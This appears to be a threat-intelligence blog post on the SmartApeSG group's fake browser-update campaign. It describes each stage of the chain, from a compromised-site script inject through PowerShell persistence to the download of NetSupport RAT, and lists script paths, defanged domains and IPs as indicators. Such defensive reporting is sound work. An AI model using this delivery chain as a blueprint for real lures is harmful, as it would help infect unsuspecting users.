SmartApeSG
By: Jonathan McCay
SmartApeSG, (ZPHP, HANEYMANEY) is a threat actor using fake browser updates to distribute Netsupport RAT. Largely confused with SocGholish, this group uses a similar looking infection chain and fake update lure. When Trellix¹ first reported the earlier techniques used by this group, the activity was unattributed. After researchers noticed this threat actor continually uses SmartApe ASN to host their infrastructure, and delivers malicious javascript through fake browser updates like SocGholish, the name SmartApeSG was given.
Site Inject:
Injected into a compromised site is a script tag used to call the first script from the Threat Actor’s infrastructure.
Minlen.php:
Minlen.php is responsible for browser validation and payload delivery. If the host was sent to this site from an acceptable referrer, and is using the correct browser, (Firefox, Chrome, or Edge) a javascript payload will be returned.
Javascript Payload — (delivered by Minlen.php)
The javascript payload delivered by minlen.php is used to construct the iframe needed to display the fake update lure. Minlen.php will also reach out to another script on the same server, (qzwewmrqqqqnaww.php) to retreive the html displayed in the iframe.
Old javascript paylaod
An older sample of the javascript payload delivered by minlen.php shows an iframe being built to display code returned by zwewmrqqqqnaww.php.
Updated javascript payload
The latest version of this script has an additional layer of obfuscation added but, appears to perform the same function
qzwewmrqqqqnaww.php — Retrieve HTML:
Returns the html for the lure which includes the javascript “update.zip” encoded in base64.
Chrome Lure (Fake Update):
Javascript — “Update”:
If the user clicks the “Update Chrome” button, a .zip containing javascript will be base64 decoded and downloaded to the host.
If the Javascript is executed, another script, (help.php) will be contacted to retrieve and execute an additional Powershell cmd.
help.php
The Powershell returned by help.php will create a run key in HKCU to setup persistence, contact another script, (111.php) to download and decode the Netsupport binaries, and execute.
111.php
Returns a base64 encoded .zip file of the Netsupport binaries. After the encoded binary is returned, the Powershell command will complete the infection.
Netsupport:
URI & Script Names
/cdn-js/wds.min.php
/cdn-js/wds-main.php
/cdn/zwmrqqgqnaww.php
/cdn/qzwewmrqqgqnaww.php
/cdn/zwewmrqqgqnaww.php
/cdn-js/minlen.php
/cdn-vs/minlen.php
/cdn/help.php
/cdn/91c818ee6e9ec29f8c1.php
/cdn/xxx.php
/cdn/www.php
/assets/js/css.js
/cgi-bin.jsHKCU — Run Key
DIVX
DIVXXSmartApeSG:
cdespto[.]org
seyishalom[.]com
baroksmig[.]online
cheetahsnv[.]com
clubcamporico[.]com
altiordp[.]com
bigbirdmarketing[.]com
ponraj[.]com
magydostravel[.]com
itsdigitalshiva[.]com
cristinaamaro[.]com
ccescpolace[.]com
kororo[.]com
fablane[.]com
amazonascash[.]com
residencialcasabrasileira[.]com
profille-cex-io[.]com
nilselsholz[.]com
credit-volta[.]com
aflomusic[.]com
webull[.]art
zahrajoulaei[.]tech
domaintestss[.]xyz
pixelbase[.]com
krafttopia[.]net
voluntarismo[.]com
kalista-posh[.]com
polyfieldgallery[.]com
seosuccesslab[.]com
offshorechain[.]org
lucyflix[.]com
mypersonalprojectdomain[.]com
marcborowy[.]com
faseries[.]com
manxheu[.]online
lintingdaun[.]com
invertirenmercados[.]com
impulsehorizon[.]com
datavortexllc[.]com
manchhd32ss[.]fun
tidaysdeals[.]online
mangoairsoft[.]com
kevinsmithson[.]com
xxxmir[.]info
phimnhanh[.]info
configuratorpro[.]com
eastrenclouds[.]com
antiqueglossary[.]com
boka-rem[.]com
mansaentertainment[.]com
loloalexander[.]com
gnavigatio[.]com
arauas[.]com
gamefllix[.]comSmartApeSG — Netsupport:
94.158.244[.]118
94.158.247[.]23
185.163.46[.]93
5.252.178[.]48
5.252.177[.]214
5.252.177[.]126
sdjfnvnbbz[.]pwReferences
1: https://www.trellix.com/about/newsroom/stories/research/new-techniques-of-fake-browser-updates/
